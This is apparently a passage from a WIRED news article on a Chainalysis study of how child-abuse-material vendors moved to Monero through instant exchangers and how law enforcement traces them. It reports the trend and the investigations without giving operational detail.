The CSAM adoption curve for those instant exchangers—and, Chainalysis suggests, the privacy coins they offer—is steep: Chainalysis found that 52 percent of CSAM vendors active in 2023 sent money to instant exchangers that let users trade bitcoins for Monero, up from around 17 percent in 2020. Two CSAM vendors that Chainalysis tracked, for example, each received about $100,000 worth of cryptocurrency payments since 2020 and over the past four years almost entirely shifted from cashing out those funds at traditional cryptocurrency exchanges to trading them on instant exchangers that offered Monero. (To avoid disrupting any ongoing law enforcement investigations, Chainalysis declined to name those vendors, other CSAM sellers, or any of the instant exchangers they've used.)

Chainalysis’ researchers went so far as to correlate CSAM vendors’ use of instant exchangers offering Monero to those sellers’ increased survival rates online: After a thousand days, about one out of five CSAM vendors who used the Monero-friendly instant exchangers were still active versus just one in 25 CSAM sellers who didn't. “The data suggests that Monero helps CSAM vendors stay in business longer,” Chainalysis’ report reads.

Fewer Agents of Exploitation—and Smarter Ones

Even as the resilience of CSAM sellers who used crypto grew in 2023, Chainalysis says the overall scale of the problem may be declining by some measures. While the company found that the number of CSAM-related cryptocurrency transactions was up 89 percent since 2019, it dropped by 22 percent from 2022 to 2023. Chainalysis also counted only 43 new vendors selling CSAM for cryptocurrency in 2023, compared to 112 the previous year.

The company's researchers speculate that the decline may be due in part to the CSAM underground's increased awareness that cryptocurrency can be traced. In the highly publicized case of the Welcome to Video dark web site, one of the biggest-ever online repositories of CSAM videos, Bitcoin tracing allowed law enforcement to identify and arrest 337 men around the world and to remove 23 children from exploitative situations. (As an example of the publicity around the case, WIRED detailed the investigation in a 2022 magazine cover story.) “It's possible that the Welcome to Video case was a wake-up call for a lot of people,” says Sasha Plotnikova, a cybercrime researcher at Chainalysis.

The Internet Watch Foundation, a UK-based anti-CSAM organization that Chainalysis consulted in its research, says it has seen a similar trend in its own analysis of cryptocurrency's use by CSAM sellers. Over the past half-decade, the IWF has seen a “steady increase” in online offers of CSAM in exchange for cryptocurrency, one of the foundation's analysts told WIRED. That trend peaked in 2022, however, with the IWF recording 1,025 instances of CSAM sellers offering to accept crypto that year, just 11 more than in 2021.

At the same time, the analyst for the IWF, who asked to remain unnamed due to the sensitivity of their work, echoed Chainalysis’ finding that Monero is now being used in the CSAM industry. “We've definitely seen cases of sites asking for payment in Monero,” the analyst told WIRED.

Apex Predators

Beyond Monero's common perception as being untraceable, to what degree Monero really _does_ protect CSAM vendors remains a subject of debate and secrecy. Chainalysis has long maintained public silence on whether it offers Monero-tracing capabilities to its customers. But a leaked slide from one of the company's presentations to Italian police in 2021 claimed that Chainalysis can provide a “usable lead” in 65 percent of cases in which it worked with law enforcement to trace Monero and could identify the likely sender, but not the recipient, in another 20 percent of cases.

On that same leaked slide, Chainalysis also referred to a case in which “customers of a CSAM website in Asia were identified from transactions with the administrator's seized Monero wallet.”

Chainalysis declined to answer WIRED's questions on Monero tracing. But its report hints that law enforcement might “consider investment in specialized blockchain analysis services that can make Monero tracing possible,” as well as calling for instant exchangers to build safeguards that prevent their abuse by CSAM sellers.

Taken together, the study suggests a form of complex and messy natural selection playing out in the internet's exploitation economy. The sellers of child abuse images and videos who once naively believed that simply using cryptocurrency would protect them from law enforcement are disappearing. They're being replaced by a new generation of surviving CSAM sellers who are far more careful in their cryptocurrency transactions. But in an ecosystem where cryptocurrency tracers like Chainalysis remain the real apex predators, even those more resilient members of the digital child abuse industry may not be as safe as they think.

_Updated at 11 am ET, January 11, 2024, with more complete historical data from the Internet Watch Foundation._

Tag

#acer